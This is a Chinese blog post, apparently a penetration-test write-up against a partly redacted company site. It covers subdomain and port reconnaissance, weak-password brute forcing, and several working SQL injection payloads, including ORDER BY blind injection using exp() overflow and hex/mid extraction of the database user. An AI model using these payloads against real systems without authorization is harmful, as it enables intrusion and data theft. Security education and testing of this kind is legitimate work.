记一次渗透测试信息收集(子域名+端口)

已于 2024-04-18 17:02:24 修改
阅读量1.4k 收藏 25
点赞数 43
分类专栏: 信息收集 文章标签: 网络安全 web安全 前端 sql
于 2023-12-26 14:58:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81113856/article/details/135220631
版权

目录

一、当主站没啥业务功能时

二、信息收集之子域名挖掘

三、信息收集之端口扫描

四、弱口令

五、后台SQL注入

六、SQL注入之排序注入

七、SQL注入之排序注入2

八、SQL注入之排序注入—补充

        碰到个有意思的,记录一下

一、当主站没啥业务功能时

    www.kxxxxxxxxxxxxxxoo.com

似乎没有啥业务功能点,开始寻找该单位的其他的资产(站点)

二、信息收集之子域名挖掘

针对“域名”作信息收集

这里没有借助其他工具,只是单纯的在fofa里直接搜索主域名

发现存在 子域名 service.kexxxxx.com

下方箭头指示的ip,大概率是真实ip

点击访问此子域名,发现页面用户名及密码字段已自动填充

打开f12,定位到密码处,将type=password 的值改成任意 type=xxx 字段

就可以得到明文密码了

奇怪的是,这里点击登录一直在转圈圈,页面无任何反应...

如同是一个假的登录框,无利用价值......

开始思考其他可测试方式

…….

三、信息收集之端口扫描

上文提到“真实ip”的概念,此个过程为专门针对于“ip”作信息收集

第一种方式:在fofa中点击此处

会返回fofa中此“ip”历史开放端口的记录(缺点:不够全面,没有最新开放端口)

第二种方式:使用端口扫描器对此“ip”进行开放端口测试,如nmap等

这里我没有使用全端口扫描

接下里就是一个端口一个端口的访问

......

四、弱口令

8087端口上开放了一个应用系统后台

盲猜弱口令 admin/123456 admin/admin 无果(无test用户),就想着爆破,然后看了下登录的请求包,发现是302跳转(不管密码是否正确,都是302跳转)

此时,两种方式

  1. 继续盲猜弱口令,尝试更多常见口令

  1. 啥也不管,直接爆破

为何密码与否会有字节差异呢

来观察一下,

Location : 该属性表示该网页的跳转网址,也被称为重定向网址。

Ps:以后碰到302跳转的登录请求,可以尝试直接爆破。

五、后台SQL注入

        用户管理处,点击搜索

        一个单引号

        两个单引号

        三个单引号

        四个单引号

        ...

        确定存在SQL注入

        开始手工注入(也可以用sqlmap)

        Poc: 'and+'a'+like+'a

        //搜索处的SQL查询语句大多为  '' like '%%'

跑用户名:c......

        Poc:1'or+user()+like+'c%

六、SQL注入之排序注入

        关键参数值 desc

检测方法:

,1  &&  ,0

,1/1  &&  ,1/0

,exp(71) && ,exp(710)

异或

        这里使用的是exp() //数值大于709就会溢出

        Poc:AdminID+desc,exp(7)

        Poc:AdminID+desc,exp(710)

        此时不难发现,溢出时,响应时间比较长

        所以在盲注中,建议条件为真时溢出

        Poc 开始变形

        Poc:AdminID+desc,if(user()+like+'r%',exp(710),exp(7))

        Poc:AdminID+desc,if(user()+like+'c%',exp(710),exp(7))

七、SQL注入之排序注入2

        同ip的8080端口,注册一个账号进行登录

        点击产品管理

        此时的请求包

        Orderby参数处添加单引号无任何区别

其他的测试思路:

        orderby 顾名思义 是对字段进行排序,我是否可以赋给它一个很大的值,看是否会有异常(当排序的字段数超过查询语句中的字段数,会产生异常信息

        页面出现异常信息,说明orderby 参数的值是代入到数据库进行查询的

       使用反引号

        使用排序注入常规的测试方式

        构造poc,注出用户名

        值得一说的是,这里用不了substr  也用不了 单引号 及 ascii函数

        //substr

        //单引号

        //ascii

        这里使用 mid  hex

        Poc:

        1,case+when+hex(mid(user(),1,1))=63+then+exp(789)+else+exp(0)+end

        得到用户名的第一位为 c

        ......

八、SQL注入之排序注入—补充

        碰到个有意思的,记录一下

        1、因果的因:

        最近碰到挺多排序注入(关键字:orderby,desc,asc等)构造的poc大多为

        1,if(1,exp(789),1)

        1,case+when+hex(mid(user(),1,1))=63+then+exp(789)+else+exp(0)+end  

        ……

        (poc的书写取决于站点是否对相关函数、单引号有所拦截)

        总之都是利用盲注的方式来获取数据,从基础的poc fuzz到poc2、poc3甚至poc4,取决于waf的强弱、个人习惯。

        2、因果的果:

        图一是使用报错注入获取用户名

        图二是验证此poc是否可用(图一图二是同一系统不同的注入点)

        图三是在有waf的情况下使用(有没有觉得这个poc有点眼熟呀)

        拿着这个poc去尝试这些天碰到的排序注入,发现都可以嗷,对比盲注来说,漏洞证明的过程还是会节省一些时间。暂不知是否通用,还需要大量的案例来验证。

        由于时间关系,只验证了排序注入,也未在本地尝试。

        ……

爱玩游戏的黑客
关注
  • 43
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
子域名收集
Lu__xiao的博客
01-16 3982
一、首先我们要了解子域名收集是什么? 1. 子域名收集可以显示很多域名或者子域名,它们在安全评估的范围内,从而增加了发现漏洞的机会。 2. 发现运行在隐藏的、被遗忘的子域名上的应用程序可以使我们发现关键的漏洞。 3.通常情况下,同一组织的不同域名或应用程序会出现相同的漏洞。 4. 在渗透中我们通常需要通过信息收集手段来了解目标的一些情况,一般而言网站主页的安全比较被重视,同理也就更难有漏洞让我们攻击,这时我们就需要利用子域名收集子域名收集在线网站 www.virustotal.com .
08-信息收集端口收集(总结版)
weixin_54626591的博客
02-17 1087
收集端口收集
子域名收集——Layer子域名挖掘机
12-26
强大的子域名收集工具,只要你有足够强大的字典,没有你扫不到的子域名,免费拿走
网络空间测绘(FOFA)常用命令
最新发布
weixin_63607914的博客
06-30 732
今天来看一下网络安全神器fofa,它在信息收集领域有这举足轻重的作用,下面我们为您来学习一下它的使用和基本语法。从url中搜索携带关键HOST信息的网站。7.搜索特定ip地址的网站信息。title="实验报告系统"11.根据服务器状态码查询。server="服务器"先看一下它的逻辑连接符。
渗透测试-信息收集-视频教学学习资料
12-09
内容:针对渗透测试信息收集视频教学学习资料,其中包括对:子域名信息的收集方式教学、web站点信息收集方式教学、端口信息收集方式教学和敏感信息收集方式教学; 适用于:目前需要学习渗透测试的群众; 场景:适用于...
python信息收集渗透测试工具源代码,带图形界面
11-04
Python是一种强大的编程语言,尤其在信息安全领域,它被广泛用于信息收集渗透测试。这个工具集,名为"collect_infor_tool-master",包含了用于这些任务的源代码,并且具有图形用户界面(GUI),使得操作更加直观和...
计算机病毒与防护:渗透测试信息收集.ppt
06-10
【计算机病毒与防护:渗透测试信息收集渗透测试是一种模拟黑客攻击行为,以评估和增强网络安全性的过程。在这个过程中,信息收集是至关重要的第一步,它涉及到对目标系统的全面了解,以便找出潜在的弱点和切入...
一次曲折的渗透测试之旅1
08-03
通过扫描子域名端口,获取目标系统的基本信息。在这次案例中,发现了一个Spring Boot应用的信息泄露,这是一个常见的Java Web框架,可能会存在多种安全风险。 1. **Spring Boot信息泄露**:Spring Boot的应用通常...
wydomain目标子域名信息收集组件
10-29
命令行使用 python wydomain.py wooyun.org 建议后台运行,然后去睡觉,一觉醒来会有新发现! nohup python wydomain.py wooyun.org & 扫描结果报告 使用浏览器打开:report/result_wooyun.org.html CentOS 安装 安装git & 下载wydomian yum -y install git git clone https://github.com/ring04h/wydomain.git 安装phantomjs http://phantomjs.org/download.html 32位系统 wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2 tar vxf phantomjs-1.9.8-linux-i686.tar.bz2 yum install openssl-devel freetype-devel fontconfig-devel cp ./bin/phantomjs /usr/bin/ 64位系统 wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-x86_64.tar.bz2 tar vxf phantomjs-1.9.8-linux-x86_64.tar.bz2 yum install openssl-devel freetype-devel fontconfig-devel cp ./bin/phantomjs /usr/bin/ 安装dnsdict6 wget http://www.thc.org/releases/thc-ipv6-2.7.tar.gz tar zvxf thc-ipv6-2.7.tar.gz cd thc-ipv6-2.7 yum install libpcap-devel openssl-devel make cp dnsdict6 /usr/bin/ Kali 安装(自带dnsdict6) 安装git & 下载wydomian apt-get install git git clone https://github.com/ring04h/wydomain.git 安装phantomjs http://phantomjs.org/download.html 32位系统 wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2 tar vxf phantomjs-1.9.8-linux-i686.tar.bz2 cp ./bin/phantomjs /usr/bin/ 64位系统 wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-x86_64.tar.bz2 tar vxf phantomjs-1.9.8-linux-x86_64.tar.bz2 cp ./bin/phantomjs /usr/bin/
信息收集子域名扫描工具oneforall
04-09
OneForAll是一款由Python编写的子域名收集工具,它可以帮助安全测试人员和渗透测试人员自动化地获取目标网站相关的子域名信息。OneForAll在设计时兼顾了准确性和速度,可以通过多种方式进行子域名的发现,例如DNS...
收集子域名
u013224189的专栏
10-28 238
https://github.com/michenriksen/aquatone
信息收集子域名收集
m0_46344990的博客
05-11 1254
一、子域名介绍 域名是个相对的概念,是相对父域名来说的。域名有很多级,中间用点分开。例如公司的顶级域名是以"com"结尾的,所有以 com 结尾的域名便都是它的子域。例如:voice.baidu.com便是"baidu.com"的子域,而 "baidu.com"是"com"的子域。 1.在渗透测试收集子域名可以发现更多的资产,如果渗透的目标面大了也增大了会有漏洞了概率 2.探测到更多隐藏或遗忘的应用服务,可能这些应用服务有严重漏洞 二、子域名收集方法 1.谷歌黑暗语法 可以直接通过浏览器来搜.
子域名搜集
weixin_34337265的博客
06-11 243
#爬虫(使用搜索引擎|如baidu) #coding=utf-8 import re import requests sites = [] for i in range(0,10): #10页为例 i = i*10 url = 'https://www.baidu.com/s?wd=site:xxx.com.cn&pn=%s' %i #设定ur...
网络安全——子域名收集
weixin_54055099的博客
08-30 1966
子域名收集方法
子域名收集方法
licheric的博客
10-13 2630
根据主域名,可以获取二级域名、三级域名、…主要姿势可以有: 【1】DNS域传送漏洞 如果存在,不仅能搜集子域名,还能轻松找到一枚洞,这样子的好事百试不厌。如果SRC一级域名不多,直接在kali下 dnsenum oldboyedu.com 。 工具说明及用法可参考如下: dnsenum的目的是尽可能收集一个域的信息,它能够通过谷歌或者字典文件猜测可能存在的域名,以及对一个网段进行反向查询。它可以查询网站的主机地址信息、域名服务器、mx record(函件交换录),在域名服务器上执行axfr请求,通过
【信息安全】工具篇--子域名收集
Nicky_Zheng的博客
11-03 900
工具篇–子域名收集 # 导入模块 import sys from threading import Thread from urllib.parse import urlparse import requests from bs4 import BeautifulSoup # bing搜索子域名 def bing_search(site, page): headers = { 'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64;
渗透测试入门:nmap与信息收集工具详解
在这个文档中,我们将深入探讨渗透测试的基础知识,包括信息收集和常用的工具如BurpSuite和nmap的具体操作。对于那些希望学习网络安全渗透测试的人来说,这是一个极好的起点。 首先,我们关注的是网络扫描工具nmap...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值